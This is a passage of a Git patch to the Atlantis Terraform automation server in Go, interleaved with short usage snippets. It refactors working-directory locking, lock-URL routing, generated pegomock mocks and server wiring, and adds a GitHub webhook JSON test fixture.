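        "github.com/runatlantis/atlantis/server/events"
        "github.com/runatlantis/atlantis/server/events/models"
    )

    // deleteWorkspaceFiles shows the intended usage: TryLock returns the
    // release function directly, so the unlock can be deferred immediately
    // and the working dir is only modified while the lock is held.
    func deleteWorkspaceFiles(wd events.WorkingDir, locker events.WorkingDirLocker,
        repo models.Repo, pull models.PullRequest, workspace string) error {
        unlock, err := locker.TryLock(repo.FullName, workspace, pull.Num)
        if err != nil {
            // another plan/apply currently owns this clone; fail rather than race
            return err
        }
        defer unlock()
        return wd.DeleteForWorkspace(repo, pull, workspace)
    }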
diff --git a/server/locks_controller_test.go b/server/locks_controller_test.go
index e78f356b21..c7d6c1fa2e 100644
--- a/server/locks_controller_test.go
+++ b/server/locks_controller_test.go
@@ -11,7 +11,9 @@ import (
"github.com/gorilla/mux"
. "github.com/petergtz/pegomock"
"github.com/runatlantis/atlantis/server"
+ "github.com/runatlantis/atlantis/server/events"
"github.com/runatlantis/atlantis/server/events/locking/mocks"
+ mocks2 "github.com/runatlantis/atlantis/server/events/mocks"
"github.com/runatlantis/atlantis/server/events/models"
vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
"github.com/runatlantis/atlantis/server/logging"
@@ -187,6 +189,8 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
RegisterMockTestingT(t)
cp := vcsmocks.NewMockClientProxy()
+ workingDir := mocks2.NewMockWorkingDir()
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
When(cp.CreateComment(AnyRepo(), AnyInt(), AnyString())).ThenReturn(errors.New("err"))
l := mocks.NewMockLocker()
When(l.Unlock("id")).ThenReturn(&models.ProjectLock{
@@ -195,9 +199,11 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
},
}, nil)
lc := server.LocksController{
- Locker: l,
- Logger: logging.NewNoopLogger(),
- VCSClient: cp,
+ Locker: l,
+ Logger: logging.NewNoopLogger(),
+ VCSClient: cp,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -212,6 +218,8 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
cp := vcsmocks.NewMockClientProxy()
l := mocks.NewMockLocker()
+ workingDir := mocks2.NewMockWorkingDir()
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
pull := models.PullRequest{
BaseRepo: models.Repo{FullName: "owner/repo"},
}
@@ -224,9 +232,11 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
},
}, nil)
lc := server.LocksController{
- Locker: l,
- Logger: logging.NewNoopLogger(),
- VCSClient: cp,
+ Locker: l,
+ Logger: logging.NewNoopLogger(),
+ VCSClient: cp,
+ WorkingDirLocker: workingDirLocker,
+ WorkingDir: workingDir,
}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -234,6 +244,7 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
lc.DeleteLock(w, req)
responseContains(t, w, http.StatusOK, "Deleted lock id \"id\"")
cp.VerifyWasCalled(Once()).CreateComment(pull.BaseRepo, pull.Num,
- "**Warning**: The plan for path: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
+ "**Warning**: The plan for dir: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
"To `apply` you must run `plan` again.")
+ workingDir.VerifyWasCalledOnce().DeleteForWorkspace(pull.BaseRepo, pull, "workspace")
}
diff --git a/server/logging/logging_test.go b/server/logging/logging_test.go
index f5cf867ba0..1eb24dc29c 100644
--- a/server/logging/logging_test.go
+++ b/server/logging/logging_test.go
@@ -13,5 +13,4 @@
//
package logging_test
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/mocks/mock_gitlab_request_parser.go b/server/mocks/mock_gitlab_request_parser.go
deleted file mode 100644
index e4598a1fe1..0000000000
--- a/server/mocks/mock_gitlab_request_parser.go
+++ /dev/null
@@ -1,84 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParser)
-
-package mocks
-
-import (
- http "net/http"
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
-)
-
-type MockGitlabRequestParser struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockGitlabRequestParser() *MockGitlabRequestParser {
- return &MockGitlabRequestParser{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
- params := []pegomock.Param{r, secret}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Validate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 interface{}
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(interface{})
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledOnce() *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockGitlabRequestParser) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParser {
- return &VerifierGitlabRequestParser{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierGitlabRequestParser struct {
- mock *MockGitlabRequestParser
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierGitlabRequestParser) Validate(r *http.Request, secret []byte) *GitlabRequestParser_Validate_OngoingVerification {
- params := []pegomock.Param{r, secret}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Validate", params)
- return &GitlabRequestParser_Validate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type GitlabRequestParser_Validate_OngoingVerification struct {
- mock *MockGitlabRequestParser
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
- r, secret := c.GetAllCapturedArguments()
- return r[len(r)-1], secret[len(secret)-1]
-}
-
-func (c *GitlabRequestParser_Validate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*http.Request, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*http.Request)
- }
- _param1 = make([][]byte, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.([]byte)
- }
- }
- return
-}
diff --git a/server/mocks/mock_gitlab_request_parser_validator.go b/server/mocks/mock_gitlab_request_parser_validator.go
new file mode 100644
index 0000000000..c23738294a
--- /dev/null
+++ b/server/mocks/mock_gitlab_request_parser_validator.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParserValidator)
+
+package mocks
+
+import (
+ http "net/http"
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+)
+
+type MockGitlabRequestParserValidator struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockGitlabRequestParserValidator() *MockGitlabRequestParserValidator {
+ return &MockGitlabRequestParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) {
+ params := []pegomock.Param{r, secret}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseAndValidate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 interface{}
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(interface{})
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledOnce() *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockGitlabRequestParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParserValidator {
+ return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierGitlabRequestParserValidator struct {
+ mock *MockGitlabRequestParserValidator
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification {
+ params := []pegomock.Param{r, secret}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseAndValidate", params)
+ return &GitlabRequestParserValidator_ParseAndValidate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type GitlabRequestParserValidator_ParseAndValidate_OngoingVerification struct {
+ mock *MockGitlabRequestParserValidator
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) {
+ r, secret := c.GetAllCapturedArguments()
+ return r[len(r)-1], secret[len(secret)-1]
+}
+
+func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*http.Request, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*http.Request)
+ }
+ _param1 = make([][]byte, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.([]byte)
+ }
+ }
+ return
+}
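
A hedged example of this generated mock in a test (the test name is hypothetical; RegisterMockTestingT, When/ThenReturn, and VerifyWasCalledOnce are the same pegomock calls used elsewhere in this patch):

    package example_test

    import (
        "bytes"
        "net/http"
        "testing"

        . "github.com/petergtz/pegomock"
        "github.com/runatlantis/atlantis/server/mocks"
    )

    func TestControllerUsesParser(t *testing.T) {
        RegisterMockTestingT(t) // wire pegomock failures into *testing.T
        m := mocks.NewMockGitlabRequestParserValidator()

        req, _ := http.NewRequest("POST", "/events", bytes.NewBufferString("{}"))
        secret := []byte("secret")

        // Plain values (no matchers) are treated as equality matchers.
        When(m.ParseAndValidate(req, secret)).ThenReturn(nil, nil)

        event, err := m.ParseAndValidate(req, secret)
        if event != nil || err != nil {
            t.Fatalf("unexpected stub result: %v, %v", event, err)
        }
        m.VerifyWasCalledOnce().ParseAndValidate(req, secret)
    }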
diff --git a/server/recovery/recovery_test.go b/server/recovery/recovery_test.go
index 0d53553159..4e2e247299 100644
--- a/server/recovery/recovery_test.go
+++ b/server/recovery/recovery_test.go
@@ -13,5 +13,4 @@
//
package recovery_test
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/router.go b/server/router.go
new file mode 100644
index 0000000000..4f4e2840da
--- /dev/null
+++ b/server/router.go
@@ -0,0 +1,31 @@
+package server
+
+import (
+ "fmt"
+ "net/url"
+
+ "github.com/gorilla/mux"
+)
+
+// Router can be used to retrieve Atlantis URLs. It acts as an intermediary
+// between the underlying router and the rest of Atlantis that might need to
+// construct URLs to different resources.
+type Router struct {
+ // Underlying is the router that the routes have been constructed on.
+ Underlying *mux.Router
+	// LockViewRouteName is the named route for the lock view that can be
+	// retrieved from the Underlying router via its Get method.
+ LockViewRouteName string
+ // LockViewRouteIDQueryParam is the query parameter needed to construct the
+ // lock view: underlying.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id").
+ LockViewRouteIDQueryParam string
+ // AtlantisURL is the fully qualified URL (scheme included) that Atlantis is
+ // being served at, ex: https://example.com.
+ AtlantisURL string
+}
+
+// GenerateLockURL returns a fully qualified URL to view the lock at lockID.
+func (r *Router) GenerateLockURL(lockID string) string {
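+	// Ignoring the error: URL construction is guaranteed to succeed as long
+	// as the route was registered with LockViewRouteIDQueryParam.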
+ path, _ := r.Underlying.Get(r.LockViewRouteName).URL(r.LockViewRouteIDQueryParam, url.QueryEscape(lockID))
+ return fmt.Sprintf("%s%s", r.AtlantisURL, path)
+}
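
Worth noting why GenerateLockURL escapes the ID: lock IDs embed the repo full name, project path, and workspace, so they contain slashes that must survive as a single query parameter value. A small sketch (the ID format shown is illustrative):

    package main

    import (
        "fmt"
        "net/url"
    )

    func main() {
        // QueryEscape turns the embedded slashes into %2F so the whole ID
        // round-trips as one ?id= value.
        fmt.Println(url.QueryEscape("owner/repo/./default"))
        // Output: owner%2Frepo%2F.%2Fdefault
    }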
diff --git a/server/router_test.go b/server/router_test.go
new file mode 100644
index 0000000000..91bf9f3fc9
--- /dev/null
+++ b/server/router_test.go
@@ -0,0 +1,27 @@
+package server_test
+
+import (
+ "net/http"
+ "testing"
+
+ "github.com/gorilla/mux"
+ "github.com/runatlantis/atlantis/server"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRouter_GenerateLockURL(t *testing.T) {
+ queryParam := "queryparam"
+ routeName := "routename"
+ atlantisURL := "https://example.com"
+
+ underlyingRouter := mux.NewRouter()
+ underlyingRouter.HandleFunc("/lock", func(_ http.ResponseWriter, _ *http.Request) {}).Methods("GET").Queries(queryParam, "{queryparam}").Name(routeName)
+
+ router := &server.Router{
+ AtlantisURL: atlantisURL,
+ LockViewRouteIDQueryParam: queryParam,
+ LockViewRouteName: routeName,
+ Underlying: underlyingRouter,
+ }
+ Equals(t, "https://example.com/lock?queryparam=myid", router.GenerateLockURL("myid"))
+}
diff --git a/server/server.go b/server/server.go
index ee0ffdf119..7eaceb7e23 100644
--- a/server/server.go
+++ b/server/server.go
@@ -36,24 +36,34 @@ import (
"github.com/runatlantis/atlantis/server/events/locking"
"github.com/runatlantis/atlantis/server/events/locking/boltdb"
"github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
+ "github.com/runatlantis/atlantis/server/events/runtime"
"github.com/runatlantis/atlantis/server/events/terraform"
"github.com/runatlantis/atlantis/server/events/vcs"
"github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
"github.com/runatlantis/atlantis/server/logging"
"github.com/runatlantis/atlantis/server/static"
"github.com/urfave/cli"
"github.com/urfave/negroni"
)
-const LockRouteName = "lock-detail"
+const (
+ // LockViewRouteName is the named route in mux.Router for the lock view.
+ // The route can be retrieved by this name, ex:
+ // mux.Router.Get(LockViewRouteName)
+ LockViewRouteName = "lock-detail"
+ // LockViewRouteIDQueryParam is the query parameter needed to construct the lock view
+ // route. ex:
+ // mux.Router.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id")
+ LockViewRouteIDQueryParam = "id"
+)
// Server runs the Atlantis web server.
type Server struct {
AtlantisVersion string
Router *mux.Router
Port int
- CommandHandler *events.CommandHandler
+ CommandRunner *events.DefaultCommandRunner
Logger *logging.SimpleLogger
Locker locking.Locker
AtlantisURL string
@@ -70,6 +80,7 @@ type Server struct {
// the config is parsed from a YAML file.
type UserConfig struct {
AllowForkPRs bool `mapstructure:"allow-fork-prs"`
+ AllowRepoConfig bool `mapstructure:"allow-repo-config"`
AtlantisURL string `mapstructure:"atlantis-url"`
DataDir string `mapstructure:"data-dir"`
GithubHostname string `mapstructure:"gh-hostname"`
@@ -94,8 +105,9 @@ type UserConfig struct {
// Config holds config for server that isn't passed in by the user.
type Config struct {
- AllowForkPRsFlag string
- AtlantisVersion string
+ AllowForkPRsFlag string
+ AllowRepoConfigFlag string
+ AtlantisVersion string
}
// WebhookConfig is nested within UserConfig. It's used to configure webhooks.
@@ -178,40 +190,24 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
return nil, err
}
lockingClient := locking.NewClient(boltdb)
- run := &run.Run{}
- configReader := &events.ProjectConfigManager{}
- workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker()
- workspace := &events.FileWorkspace{
+ workingDirLocker := events.NewDefaultWorkingDirLocker()
+ workingDir := &events.FileWorkspace{
DataDir: userConfig.DataDir,
}
- projectPreExecute := &events.DefaultProjectPreExecutor{
- Locker: lockingClient,
- Run: run,
- ConfigReader: configReader,
- Terraform: terraformClient,
- }
- applyExecutor := &events.ApplyExecutor{
- VCSClient: vcsClient,
- Terraform: terraformClient,
- RequireApproval: userConfig.RequireApproval,
- Run: run,
- AtlantisWorkspace: workspace,
- ProjectPreExecute: projectPreExecute,
- Webhooks: webhooksManager,
+ projectLocker := &events.DefaultProjectLocker{
+ Locker: lockingClient,
}
- planExecutor := &events.PlanExecutor{
- VCSClient: vcsClient,
- Terraform: terraformClient,
- Run: run,
- Workspace: workspace,
- ProjectPreExecute: projectPreExecute,
- Locker: lockingClient,
- ProjectFinder: &events.DefaultProjectFinder{},
+ underlyingRouter := mux.NewRouter()
+ router := &Router{
+ AtlantisURL: userConfig.AtlantisURL,
+ LockViewRouteIDQueryParam: LockViewRouteIDQueryParam,
+ LockViewRouteName: LockViewRouteName,
+ Underlying: underlyingRouter,
}
pullClosedExecutor := &events.PullClosedExecutor{
- VCSClient: vcsClient,
- Locker: lockingClient,
- Workspace: workspace,
+ VCSClient: vcsClient,
+ Locker: lockingClient,
+ WorkingDir: workingDir,
}
logger := logging.NewSimpleLogger("server", nil, false, logging.ToLogLevel(userConfig.LogLevel))
eventParser := &events.EventParser{
@@ -226,22 +222,51 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
GitlabUser: userConfig.GitlabUser,
GitlabToken: userConfig.GitlabToken,
}
- commandHandler := &events.CommandHandler{
- ApplyExecutor: applyExecutor,
- PlanExecutor: planExecutor,
- LockURLGenerator: planExecutor,
- EventParser: eventParser,
+ defaultTfVersion := terraformClient.Version()
+ commandRunner := &events.DefaultCommandRunner{
VCSClient: vcsClient,
GithubPullGetter: githubClient,
GitlabMergeRequestGetter: gitlabClient,
CommitStatusUpdater: commitStatusUpdater,
- AtlantisWorkspaceLocker: workspaceLocker,
+ EventParser: eventParser,
MarkdownRenderer: markdownRenderer,
Logger: logger,
AllowForkPRs: userConfig.AllowForkPRs,
AllowForkPRsFlag: config.AllowForkPRsFlag,
+ ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+ ParserValidator: &yaml.ParserValidator{},
+ ProjectFinder: &events.DefaultProjectFinder{},
+ VCSClient: vcsClient,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
+ AllowRepoConfig: userConfig.AllowRepoConfig,
+ AllowRepoConfigFlag: config.AllowRepoConfigFlag,
+ },
+ ProjectCommandRunner: &events.DefaultProjectCommandRunner{
+ Locker: projectLocker,
+ LockURLGenerator: router,
+ InitStepRunner: &runtime.InitStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTfVersion,
+ },
+ PlanStepRunner: &runtime.PlanStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTfVersion,
+ },
+ ApplyStepRunner: &runtime.ApplyStepRunner{
+ TerraformExecutor: terraformClient,
+ },
+ RunStepRunner: &runtime.RunStepRunner{
+ DefaultTFVersion: defaultTfVersion,
+ },
+ PullApprovedChecker: vcsClient,
+ WorkingDir: workingDir,
+ Webhooks: webhooksManager,
+ WorkingDirLocker: workingDirLocker,
+ RequireApprovalOverride: userConfig.RequireApproval,
+ },
}
- repoWhitelist := &events.RepoWhitelist{
+ repoWhitelist := &events.RepoWhitelistChecker{
Whitelist: userConfig.RepoWhitelist,
}
locksController := &LocksController{
@@ -250,27 +275,28 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
Logger: logger,
VCSClient: vcsClient,
LockDetailTemplate: lockTemplate,
+ WorkingDir: workingDir,
+ WorkingDirLocker: workingDirLocker,
}
eventsController := &EventsController{
- CommandRunner: commandHandler,
- PullCleaner: pullClosedExecutor,
- Parser: eventParser,
- CommentParser: commentParser,
- Logger: logger,
- GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret),
- GithubRequestValidator: &DefaultGithubRequestValidator{},
- GitlabRequestParser: &DefaultGitlabRequestParser{},
- GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret),
- RepoWhitelist: repoWhitelist,
- SupportedVCSHosts: supportedVCSHosts,
- VCSClient: vcsClient,
+ CommandRunner: commandRunner,
+ PullCleaner: pullClosedExecutor,
+ Parser: eventParser,
+ CommentParser: commentParser,
+ Logger: logger,
+ GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret),
+ GithubRequestValidator: &DefaultGithubRequestValidator{},
+ GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{},
+ GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret),
+ RepoWhitelistChecker: repoWhitelist,
+ SupportedVCSHosts: supportedVCSHosts,
+ VCSClient: vcsClient,
}
- router := mux.NewRouter()
return &Server{
AtlantisVersion: config.AtlantisVersion,
- Router: router,
+ Router: underlyingRouter,
Port: userConfig.Port,
- CommandHandler: commandHandler,
+ CommandRunner: commandRunner,
Logger: logger,
Locker: lockingClient,
AtlantisURL: userConfig.AtlantisURL,
@@ -291,14 +317,8 @@ func (s *Server) Start() error {
s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo}))
s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST")
s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}")
- lockRoute := s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries("id", "{id}").Name(LockRouteName)
- // function that planExecutor can use to construct detail view url
- // injecting this here because this is the earliest routes are created
- s.CommandHandler.SetLockURL(func(lockID string) string {
- // ignoring error since guaranteed to succeed if "id" is specified
- u, _ := lockRoute.URL("id", url.QueryEscape(lockID))
- return s.AtlantisURL + u.RequestURI()
- })
+ s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").
+ Queries(LockViewRouteIDQueryParam, fmt.Sprintf("{%s}", LockViewRouteIDQueryParam)).Name(LockViewRouteName)
n := negroni.New(&negroni.Recovery{
Logger: log.New(os.Stdout, "", log.LstdFlags),
PrintStack: false,
@@ -349,7 +369,7 @@ func (s *Server) Index(w http.ResponseWriter, _ *http.Request) {
var lockResults []LockIndexData
for id, v := range locks {
- lockURL, _ := s.Router.Get(LockRouteName).URL("id", url.QueryEscape(id))
+ lockURL, _ := s.Router.Get(LockViewRouteName).URL("id", url.QueryEscape(id))
lockResults = append(lockResults, LockIndexData{
LockURL: lockURL.String(),
RepoFullName: v.Project.RepoFullName,
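
The server.go changes above replace the SetLockURL callback with a named mux route that any component can resolve later. A minimal, self-contained sketch of that gorilla/mux round-trip (route name and query param match the constants above; the handler is a stub):

    package main

    import (
        "fmt"
        "net/http"

        "github.com/gorilla/mux"
    )

    func main() {
        r := mux.NewRouter()
        // Register the route once, with its query param and a name.
        r.HandleFunc("/lock", func(http.ResponseWriter, *http.Request) {}).
            Methods("GET").
            Queries("id", "{id}").
            Name("lock-detail")

        // Later, rebuild the URL from just the name and the param value.
        u, err := r.Get("lock-detail").URL("id", "some-lock-id")
        if err != nil {
            panic(err)
        }
        fmt.Println(u.String()) // /lock?id=some-lock-id
    }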
diff --git a/server/server_test.go b/server/server_test.go
index aba146ef54..cec7a4fcb9 100644
--- a/server/server_test.go
+++ b/server/server_test.go
@@ -78,7 +78,7 @@ func TestIndex_Success(t *testing.T) {
r := mux.NewRouter()
atlantisVersion := "0.3.1"
// Need to create a lock route since the server expects this route to exist.
- r.NewRoute().Path("").Name(server.LockRouteName)
+ r.NewRoute().Path("").Name(server.LockViewRouteName)
s := server.Server{
Locker: l,
IndexTemplate: it,
@@ -103,6 +103,7 @@ func TestIndex_Success(t *testing.T) {
}
func responseContains(t *testing.T, r *httptest.ResponseRecorder, status int, bodySubstr string) {
+ t.Helper()
Equals(t, status, r.Result().StatusCode)
body, _ := ioutil.ReadAll(r.Result().Body)
Assert(t, strings.Contains(string(body), bodySubstr), "exp %q to be contained in %q", bodySubstr, string(body))
diff --git a/server/testfixtures/githubIssueCommentEvent.json b/server/testfixtures/githubIssueCommentEvent.json
new file mode 100644
index 0000000000..a15f67ed4a
--- /dev/null
+++ b/server/testfixtures/githubIssueCommentEvent.json
@@ -0,0 +1,207 @@
+{
+ "action": "created",
+ "issue": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+ "repository_url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/labels{/name}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/events",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+ "id": 330256251,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+ "number": 1,
+ "title": "Add new project layouts",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "labels": [
+
+ ],
+ "state": "open",
+ "locked": false,
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "milestone": null,
+ "comments": 61,
+ "created_at": "2018-06-07T12:45:41Z",
+ "updated_at": "2018-06-13T12:53:40Z",
+ "closed_at": null,
+ "author_association": "OWNER",
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch"
+ },
+ "body": ""
+ },
+ "comment": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments/396926483",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1#issuecomment-396926483",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+ "id": 396926483,
+ "node_id": "MDEyOklzc3VlQ29tbWVudDM5NjkyNjQ4Mw==",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "created_at": "2018-06-13T12:53:40Z",
+ "updated_at": "2018-06-13T12:53:40Z",
+ "author_association": "OWNER",
+ "body": "###comment body###"
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
